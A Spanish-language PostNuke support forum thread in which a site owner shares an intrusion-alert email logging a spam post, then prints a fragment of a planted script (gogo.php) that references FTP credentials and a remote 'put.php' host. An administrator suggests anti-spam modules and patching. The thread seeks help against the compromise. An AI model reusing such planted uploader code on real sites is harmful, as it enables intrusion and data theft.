¿Nuevo usuario?
Puedes registrarte aquí
 
       
Menú principal
 
 Navegación
Buscar
dpForo
dpFAQ
dpManuales
dpDescargas
dpThemes
Noticias por Temas
Recomiéndanos
Enlaces
Créditos
dzStaffStatus
Miembros:  Administradores
No Conectado  el_cuervo  
No Conectado  Dixso  
Miembros:  Colaboradores
No Conectado  AnyKiller  
No Conectado  nestormateo  
No Conectado  docser  
Miembros:  Moderadores
No Conectado  cardiru  
No Conectado  javiermisol  
Miembros:  Traductores
No Conectado  gnrx  
Miembros:  Miembros:
Ultimo:  Nuevos Hoy: 2
Ultimo:  Nuevos Ayer: 4
Ultimo:  Total: 71811
Ultimo:  Ultimo:
6871845
Miembros:  Conectados
Miembros:  Miembros: 0
Invitados:  Invitados: 54
Total:  Total: 54
Miembros:  Miembros Online
No hay miembros conectados
Sponsor
dp-Tools
 Generador de Menús
 Pop-Up Maker
 Generador de Bloques
 Generador de Módulos
Enlázanos


Texto del enlace:


Otros Banners:



Theme creado por
dev-postnuke.com

 Foro dev-postnuke.com
  General :: Off-Topic
  Alguien podria decirme que significa este mensaje que me reporto postnuke

Bienvenido invitado

Moderado por: el_cuervo, Dixso, AnyKiller, cardiru, javiermisol, MrGer, Ramses << Tema anterior   Tema siguiente >>
Imprimir tema
Ir a la pagina : 1 2 Pagina siguiente
Autor Tema: Alguien podria decirme que significa este mensaje que me reporto postnuke
polimar
Enviado: 12/10/2008 a las 13:10
Habitual
Habitual


Karma: 10 (1 Votos)

Registrado: 14/10/06
Mensajes: 82

Estado: Desconectado
Ultima visita: 07/01/09
Pues eso, un buen dia llego a mi ordenador y compuebo que el gestor de correos (thuderbird por supuesto), hay este mensaje:

CitaAttention site admin of AUTOPOLI,
On 21 Ago, 2008 at 06:48 the PostNuke code has detected that somebody tried to send information to your site that may have been intended as a hack. Do not panic, it may be harmless: maybe this detection was triggered by something you did!
Anyway, it was detected and blocked.
The suspicious activity was recognized in pnAntiCracker on line 77, and is of the type pnSecurity Alert.
Additional information given by the code which detected this: POST Intrusion detection.

Below you will find a lot of information obtained about this attempt, that may help you to find what happened and maybe who did it.


=====================================
Information about this user:
=====================================
PostNuke username: emaiselikek
Registered email of this PostNuke user:
unpaddeva@mymail-in.net
Registered real name of this PostNuke user:
IP numbers: [note: when you are dealing with a
real cracker these IP numbers might not be from
the actual computer he is working on]
IP according to HTTP_CLIENT_IP:
IP according to REMOTE_ADDR: 98.198.95.160
IP according to
GetHostByName($_SERVER['REMOTE_ADDR']):
98.198.95.160


=====================================
Browser information
=====================================
HTTP_USER_AGENT: Mozilla/5.0 (Windows; U; Windows
NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5
BROWSER * 0 :

=====================================
Information in the $_GET array
This is about variables that may have been in the
URL string or in a 'GET' type form.
=====================================

=====================================
Information in the $_POST array
This is about visible and invisible form elements.
=====================================
POST * subject : lady rolex watch with the pink
covers
POST * postimageselect : NONE
POST * addbbcode18 : #444444
POST * addbbcode20 : 7
POST * helpbox : Nota: Se pueden aplicar estilos
rápidamente al texto seleccionado
POST * message : white gold garnet mom ring
ddg
custom jewelry

<a
href=http://soblaz.strefa.pl/metal1641.html>swim
jewelry
http://sobla.987mb.com/gold9172.html sabika
austrian crystal jewelry erie
POST * mode : newtopic
POST * sid : 63fb442a35b6d60ae0c66113570b171d
POST * f : 47
POST * post : Enviar

=====================================
Information in the $_COOKIE array
=====================================
COOKIE * POSTNUKESID :
aef06b08f274d68b5977403668a07d5d
COOKIE * pnphpbb2mysql_data :
a:1:{s:6:\"userid\";s:3:\"128\";}
COOKIE * pnphpbb2mysql_sid :
63fb442a35b6d60ae0c66113570b171d

=====================================
Information in the $_FILES array
=====================================

=====================================
Information in the $_SESSION array
This is session info. The variables
starting with PNSV are PostNukeSessionVariables.
=====================================
SESSION * PNSVrand : 1565396515
SESSION * PNSVlang : spa
SESSION * PNSVfullpage : 0
SESSION * PNSVsubforum : 0
SESSION * PNSVuid : 128


La verdad es que no se que pasa pero paso a dar unas caracteristicas de mi postnuke 0.763, foros phpbb2, etc

Ultimamente el uso del disco duro del servidor, se gasta solo (es decir yo no subo nada, pero se consumen los Mb)

El trafico de banda ancha, tambien sube como la espuma (sin tener una afluencia grande de usuarios)

El area de descargas de mi web, no baja los archivos desde mi propio espacio en servidore, si no que utilizo otros externos.

Espero que alguien me pueda ayudar.

Un saludo y gracias por anticipado.
polimar Enviar MP


polimar
Enviado: 12/10/2008 a las 19:10
Habitual
Habitual


Karma: 10 (1 Votos)

Registrado: 14/10/06
Mensajes: 82

Estado: Desconectado
Ultima visita: 07/01/09
Siguiendo con mis tareas de investigacion he descubierto una carpeta dentro de public_html (es decir donde está el postnuke), llamada UPLDR con el archivo gogo.php en su interior, el cual tiene este contenido.

Cita<?

$ftp_name = "ftp://******:******@host-profesional.com";

$remote_host = "http://alojados.com/images/put.php";

if (file_exists("already.sent"))

{

exit(0);

} else

{

$fp = fopen("already.sent", "w");

fclose($fp);

}

?>

<html><head>"></head>


el user y la clave en donde estan los asteriscos, son lo validos en el archivo.

Si decir que eso no lo he colocado yo.

Espero la ayuda de todos vosotros, es urgente.

La capacidad de mi servidor esta en el limite (ya no tengo espacio se consumieron los 300 Mb, con una pagina que a lo sumo es de 150 Mb) y el trafico mensual que lo tengo de maximo en 2 Gb, en los 12 primeros dias ya se consumio casi 1 Gb.

Gracias y ayuda.
polimar Enviar MP
nestormateo
Enviado: 13/10/2008 a las 05:10
Administrador
Administrador

avatar

Karma: 10 (68 Votos)

Registrado: 07/07/06
Mensajes: 1483

Estado: Desconectado
Ultima visita: 23/12/08
Creo que además de aplicar el parche para la 0.764
debes instalar BadBehavior o Akismet
para parar los ataques de SPAM

Robots están tratando de poner publicidad en tu sitio
entonces debes bloquearlos con alguno o ambos módulos anti-spam.
good


Mateo Tibaquira
-Mis principios... son mis fines-
nestormateo Enviar MP WwW
polimar
Enviado: 13/10/2008 a las 11:10
Habitual
Habitual


Karma: 10 (1 Votos)

Registrado: 14/10/06
Mensajes: 82

Estado: Desconectado
Ultima visita: 07/01/09
gracias lo voy a intentar, bueno que digo, me pongo manos a la obra.

No actualize a la 0.764 poruqe el modulo poscalendar se fastidiaba cuando lo hacia.

Pero en fin, no nos queda otra.

Yo he señalado las tres opciones pero no se lo que significan (salvo la primera)

CitaActivar Bad Behaviour
Verbose HTTP request logging (Logs all requests not just those blocked)
Comprobación estricta (bloquea más spam pero puede bloquear a usuarios legítimos)


Otra cosa (yo uso firefox) pero no se como hacer lo que me dicen:

CitaPara comprobar si Bad Behaviour está funcionando correctamente añada 'Bad Behavior Test' como USER_AGENT en una petición HTTP. ¿Suena complicado? En IE probablemente.... Sin embargo, si usa Firefox instale el plugin 'Modify Headers' y podrás hacerlo.


Un saludo y gracias nestormateo.





editado por: polimar, 13 Oct, 2008 - 01:13
polimar Enviar MP
nestormateo
Enviado: 14/10/2008 a las 00:10
Administrador
Administrador

avatar

Karma: 10 (68 Votos)

Registrado: 07/07/06
Mensajes: 1483

Estado: Desconectado
Ultima visita: 23/12/08
Mmmm
Sólo activa la primera
lo otro parece muy radical
:-P

Pues nunca he hecho eso desde Firefox tampoco
pero habría que buscar ese plugin "Modify Headers"
a ver como se puede hacer esa prueba.
Igual vas a notar el cambio pues no te vvan a llegar más correos de esos.
good


Mateo Tibaquira
-Mis principios... son mis fines-
nestormateo Enviar MP WwW
polimar
Enviado: 14/10/2008 a las 00:10
Habitual
Habitual


Karma: 10 (1 Votos)

Registrado: 14/10/06
Mensajes: 82

Estado: Desconectado
Ultima visita: 07/01/09
Hola nestormateo, he incluido los dos pluugins BadBehavior o Akismet, y de momento ahi estan.

El trafico de mi pa<gina se mantiene, pero el uso (capacidad) del servidor en cuestion de Mb sigue aumentando (el administrrador del server me lo puso enm los 142 Mb que son los normales, pero de nuevo sigue aumentando: casi 200 Mb de nuevo)

Espero vuestra ayuda (ya está actualizado a 0.764)

Un saludo.
polimar Enviar MP
nestormateo
Enviado: 15/10/2008 a las 00:10
Administrador
Administrador

avatar

Karma: 10 (68 Votos)

Registrado: 07/07/06
Mensajes: 1483

Estado: Desconectado
Ultima visita: 23/12/08
Deben ser las otras dos opciones.
Si activas el "Verbose HTTP request logging" creo que va a crear logs en el pnTemp que van a ocupar bastante espacio, por lo que te recomendaría mirar la carpeta pnTemp a ver si hay muchos archivos allí, y limpiar lo que se pueda como plantillas compiladas de pnRender y Xanthia

Tienes que saber donde es que están aumentando el tamaño/cantidad de los archivos,y ahi sabremos qué los está creando...


Mateo Tibaquira
-Mis principios... son mis fines-
nestormateo Enviar MP WwW
polimar
Enviado: 15/10/2008 a las 20:10
Habitual
Habitual


Karma: 10 (1 Votos)

Registrado: 14/10/06
Mensajes: 82

Estado: Desconectado
Ultima visita: 07/01/09
Hola nestormateo, como te dije instale los dos modulos antispam (el BadBehavior, en su modulo de administracion me dice que ha neutralizado 0 intentos) pero del Akismet no tiene administracion del modulo y no se si esta funcionando bien.

El consumo de Mb dentro de mi pagina sigue aumentando y por mucho que miro y remiro, no soy caaz de encontrar nada mas grande de 1 Mb por toda la pagina en el servidor.

El trafico tambien sigue aumentando aunque este lo hace un poco mas despacio que antes.

Voy a desmarcar la opcion Verbose HTTP request logging.

En el servidor hay una carpeta en el directorio raiz que no tengo permiso para abrirla "logs", eso es normal.??

Un saludo de un forero desesperado



editado por: polimar, 15 Oct, 2008 - 09:04
polimar Enviar MP
nestormateo
Enviado: 15/10/2008 a las 21:10
Administrador
Administrador

avatar

Karma: 10 (68 Votos)

Registrado: 07/07/06
Mensajes: 1483

Estado: Desconectado
Ultima visita: 23/12/08
Esa logs ha de ser la del BadBehavior.
Con la segunda opción ya deshabilitada
pídele al admin del servidor que te borre esa carpeta
a ver si es la que está consumiendo todo eso
sino, que haga el favor de ver donde está la mayoría de ese espacio...


Mateo Tibaquira
-Mis principios... son mis fines-
nestormateo Enviar MP WwW
polimar
Enviado: 15/10/2008 a las 22:10
Habitual
Habitual


Karma: 10 (1 Votos)

Registrado: 14/10/06
Mensajes: 82

Estado: Desconectado
Ultima visita: 07/01/09
Hola nestormateo, hablé con el que administra el hosting (andreu araque) y me comento que no entendia como una pagina que solo ocupa unos 150 Mb, podia ocupar lños 300 Mb. El no sabia el porque.

Si tu quisieras yo no tendria problema en darte unas claves para que accedieras a mi cpanel e intentar buscar esa cantidad de Mb que no es nadie capaz de encontrar, así como los Mb de trafico mensual.

Gracias de nuevo y un saludo.



editado por: polimar, 15 Oct, 2008 - 11:22
polimar Enviar MP
polimar
Enviado: 16/10/2008 a las 18:10
Habitual
Habitual


Karma: 10 (1 Votos)

Registrado: 14/10/06
Mensajes: 82

Estado: Desconectado
Ultima visita: 07/01/09
Hola de nuevo nestormateo, esto es alucinante ayer a ultima hora rozaba los 297 Mb, pero esta tarde que lo he mirado se ha puesto en unos 139 Mb de uso del disco.

Lo curioso es que el consumo del disco aumenta por minutos de una forma desorbitada.

Sin embargo el consumo de trafico de datos se esta manteniendo dentro de una normalidad desde que se le quito la carpeta UPLDR con el archivo gogo.php en su interior.

Pues cada vez entiendo menos.

Un saludo.
polimar Enviar MP
nestormateo
Enviado: 16/10/2008 a las 20:10
Administrador
Administrador

avatar

Karma: 10 (68 Votos)

Registrado: 07/07/06
Mensajes: 1483

Estado: Desconectado
Ultima visita: 23/12/08
Esta loco ese server tongue
o el admin le metió la mano y lo bajó a 139,
jejeje
dejemos a ver si él da con el problema wink


Mateo Tibaquira
-Mis principios... son mis fines-
nestormateo Enviar MP WwW
polimar
Enviado: 16/10/2008 a las 21:10
Habitual
Habitual


Karma: 10 (1 Votos)

Registrado: 14/10/06
Mensajes: 82

Estado: Desconectado
Ultima visita: 07/01/09
Ok muchas gracias. Ya te comentaré en breve como va.

Un saludo good
polimar Enviar MP
polimar
Enviado: 18/10/2008 a las 02:10
Habitual
Habitual


Karma: 10 (1 Votos)

Registrado: 14/10/06
Mensajes: 82

Estado: Desconectado
Ultima visita: 07/01/09
Hola de nuevo nestormateo; el servidor sigue con su historia personal.

Despues de lo comentado anetriormente estos son los resulados:

uso de HD de servidor: 200 Mb
transferencia: 1264 Mb

Se mantiene una transferencia normal, pero el uso del HD como te comente, sigue aumentando.

Estoy loco entre este servidor y la actualizacion a zikula (como sabras de otro tema de este foro)

Aun así, un saludo y muchas gracias por tu atencion y esfuerzo (que creo, nadie valora lo suficiente)

clapping
polimar Enviar MP
nestormateo
Enviado: 18/10/2008 a las 06:10
Administrador
Administrador

avatar

Karma: 10 (68 Votos)

Registrado: 07/07/06
Mensajes: 1483

Estado: Desconectado
Ultima visita: 23/12/08
Descartemos una opción fácil:
Hay muchos archivos en la carpeta /pnTemp/error_logs
alli se guardan los logs de Zikula
si la opción está habilitada...
sino, es el BadBehavior o hasta el log de PHP puede ser,
se necesita ubicar ese consumo para savber donde "apagarlo".

Y gracias por las gracias biggrin
que si lo valoran y hay cosas muy gratificantes en esta labor
wink


Mateo Tibaquira
-Mis principios... son mis fines-
nestormateo Enviar MP WwW
Ir a la pagina : 1 2 Pagina siguiente




Powered by pnForum Version 2.6

Inicio  |  dpFaq  |  dpManuales  |  dpDescargas  |  dpThemes  |  Contacta

Web site powered by PostNuke MySQL PHP Postnuke Spain PHP RSSPixel Add to Technorati Favorites

Todos los logos y marcas registradas en este sitio son propiedad de sus respectivos dueños. Los comentarios son propiedad de sus autores, el resto es de este sitio Web (c) 2003, que fue creado con PostNuke, un sistema portal Web escrito en PHP. PostNuke es Software Libre liberado bajo la licencia GNU/GPL.

Dev-CMS.com :: Amplía tus horizontes.

HOSPEDAJE Y DOMINIOS -- Tu Hosting
Alojamiento Web --- Registro de Dominios